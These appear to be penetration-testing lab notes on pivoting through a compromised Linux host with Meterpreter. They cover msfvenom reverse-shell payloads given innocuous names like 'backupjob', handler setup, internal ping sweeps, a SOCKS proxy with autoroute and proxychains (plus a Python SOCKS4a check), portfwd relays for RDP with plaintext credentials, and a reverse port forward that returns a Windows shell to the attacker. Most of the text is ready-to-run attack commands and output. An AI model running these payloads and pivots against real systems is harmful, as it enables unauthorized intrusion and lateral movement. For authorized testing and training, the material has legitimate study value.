
Meterpreter Tunneling & Port Forwarding

Create pivots using Meterpreter sessions without relying on SSH port forwarding. Useful when you already have a Meterpreter shell on a pivot host and want to enumerate or exploit hosts on an internal network.

Setting Up the Meterpreter Session on the Pivot Host

Step 1: Create Payload for the Ubuntu Pivot Host

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080

Step 2: Configure & Start the multi/handler

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

Step 3: Execute the Payload on the Pivot Host

Copy the binary to the pivot host over SSH and run it:

chmod +x backupjob
./backupjob

Confirm the session is established:

[*] Sending stage (3020772 bytes) to 10.129.202.64
[*] Meterpreter session 1 opened (10.10.14.18:8080 -> 10.129.202.64:39826)
meterpreter > pwd
/home/ubuntu

Ping Sweeps Through the Pivot

Using Meterpreter’s ping_sweep Module

meterpreter > run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23

Ping Sweep For Loop on Linux Pivot Hosts

for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done

Ping Sweep For Loop Using CMD

for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"

Ping Sweep Using PowerShell

1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"}

Note: A ping sweep may not return results on the first attempt due to ARP cache build time. Run it at least twice. If ICMP is blocked by a firewall, use a TCP scan instead.

SOCKS Proxy with Metasploit (AutoRoute + proxychains)

Instead of SSH dynamic port forwarding, use Metasploit’s socks_proxy module to create a local SOCKS proxy that routes traffic through the Meterpreter session.

Step 1: Configure MSF’s SOCKS Proxy

msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 4a
msf6 auxiliary(server/socks_proxy) > run

Confirm the proxy is running:

msf6 auxiliary(server/socks_proxy) > jobs

Jobs
====

  Id  Name                           Payload  Payload opts
  --  ----                           -------  ------------
  0   Auxiliary: server/socks_proxy

Step 2: Configure proxychains

Add (or verify) this line at the end of /etc/proxychains.conf:

socks4  127.0.0.1 9050

Note: Depending on the SOCKS server version, you may need to change socks4 to socks5.

Step 3: Create Routes with AutoRoute

Option A: Using the post module

msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
msf6 post(multi/manage/autoroute) > run

Option B: From the Meterpreter session directly

meterpreter > run autoroute -s 172.16.5.0/23

Step 4: Verify Active Routes

meterpreter > run autoroute -p

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.129.0.0         255.255.0.0        Session 1
   172.16.4.0         255.255.254.0      Session 1
   172.16.5.0         255.255.254.0      Session 1

Step 5: Test Proxy & Routing

proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn

Example output:

|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
Discovered open port 3389/tcp on 172.16.5.19
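The same Step 5 check can be done without proxychains by speaking SOCKS4a to the listener directly. The following is an added example, not part of the original notes: it builds the SOCKS4a CONNECT request the Metasploit socks_proxy module (set to version 4a) expects on 127.0.0.1:9050 and decodes the 8-byte reply, so a granted reply confirms the AutoRoute entry is carrying traffic through the session. It does not apply if the listener was started with version 5.

```python
import socket
import struct

SOCKS_VERSION = 4
CMD_CONNECT = 1
# SOCKS4 reply codes (CD field of the 8-byte server reply)
REPLY_CODES = {
    0x5A: "request granted",
    0x5B: "request rejected or failed",
    0x5C: "identd not reachable",
    0x5D: "identd user mismatch",
}


def build_socks4a_connect(host: str, port: int, userid: str = "") -> bytes:
    """Build a SOCKS4/4a CONNECT request: VN CD DSTPORT DSTIP USERID NUL.

    A dotted-quad host is sent as a plain SOCKS4 request. A hostname uses
    the 4a extension: DSTIP is the dummy 0.0.0.1 and the hostname follows
    the userid, so the proxy (the pivot side) performs the DNS lookup.
    """
    try:
        dst_ip = socket.inet_aton(host)
        tail = b""
    except OSError:
        dst_ip = b"\x00\x00\x00\x01"
        tail = host.encode("idna") + b"\x00"
    return (struct.pack("!BBH", SOCKS_VERSION, CMD_CONNECT, port)
            + dst_ip + userid.encode() + b"\x00" + tail)


def parse_socks4_reply(data: bytes) -> tuple:
    """Decode the reply (VN=0, CD, DSTPORT, DSTIP) into (granted, reason)."""
    if len(data) < 8:
        return False, "short reply (%d bytes)" % len(data)
    _vn, code, _port, _ip = struct.unpack("!BBH4s", data[:8])
    return code == 0x5A, REPLY_CODES.get(code, "unknown code 0x%02x" % code)


def check_route(dest_host: str, dest_port: int,
                proxy=("127.0.0.1", 9050), timeout: float = 5.0) -> tuple:
    """Ask the socks_proxy listener to CONNECT to dest through the routed
    session; a granted reply means the Meterpreter route carried it."""
    with socket.create_connection(proxy, timeout=timeout) as s:
        s.sendall(build_socks4a_connect(dest_host, dest_port))
        return parse_socks4_reply(s.recv(8))
```

With the listener from Step 1 running, `check_route("172.16.5.19", 3389)` returns `(True, "request granted")` when the route works and a `0x5B` rejection when the session cannot reach the host.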

Meterpreter Port Forwarding (portfwd)

Use Meterpreter’s portfwd module to forward ports through the session without needing proxychains.

portfwd Options

meterpreter > help portfwd

Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

    -h        Help banner.
    -i <opt>  Index of the port forward entry to interact with (see the "list" command).
    -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
    -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
    -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
    -r <opt>  Forward: remote host to connect to.
    -R        Indicates a reverse port forward.

Creating a Local TCP Relay

Forward local port 3300 to the Windows target’s RDP port:

meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19
[*] Local TCP relay created: :3300 <-> 172.16.5.19:3389

Then connect via RDP through the forwarded port:

xfreerdp /v:localhost:3300 /u:victor /p:pass@123

Verify with netstat:

netstat -antp
# tcp   0   0 127.0.0.1:54652   127.0.0.1:3300   ESTABLISHED 4075/xfreerdp

Meterpreter Reverse Port Forwarding

Use reverse port forwarding when you want a compromised host on the internal network to send a shell back through the pivot host to your attack host.

Step 1: Create Reverse Port Forward Rule

From the Meterpreter session on the pivot host, forward all connections received on port 1234 to your attack host on port 8081:

meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18
[*] Local TCP relay created: 10.10.14.18:8081 <-> :1234

Step 2: Configure & Start multi/handler for Windows

meterpreter > bg
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 8081
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
msf6 exploit(multi/handler) > run

Step 3: Generate the Windows Payload

The payload connects back to the pivot host (not directly to the attack host):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234

Step 4: Execute the Payload on the Windows Target

Once the payload runs on the Windows host, the connection flows:

Windows (172.16.5.19:1234) → Pivot (172.16.5.129:1234) → Meterpreter session (reverse portfwd) → Attack Host (10.10.14.18:8081)

Confirm the session:

[*] Started reverse TCP handler on 0.0.0.0:8081
[*] Sending stage (200262 bytes) to 10.10.14.18
[*] Meterpreter session 2 opened (10.10.14.18:8081 -> 10.10.14.18:40173)

meterpreter > shell
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\>

When to Use

  • Already have a Meterpreter session on the pivot host
  • Need SOCKS proxy routing without SSH access
  • Want to forward specific ports through the pivot (portfwd)
  • Need reverse port forwarding for internal hosts that cannot reach the attack host directly
  • Prefer Metasploit’s integrated tooling over manual SSH tunnels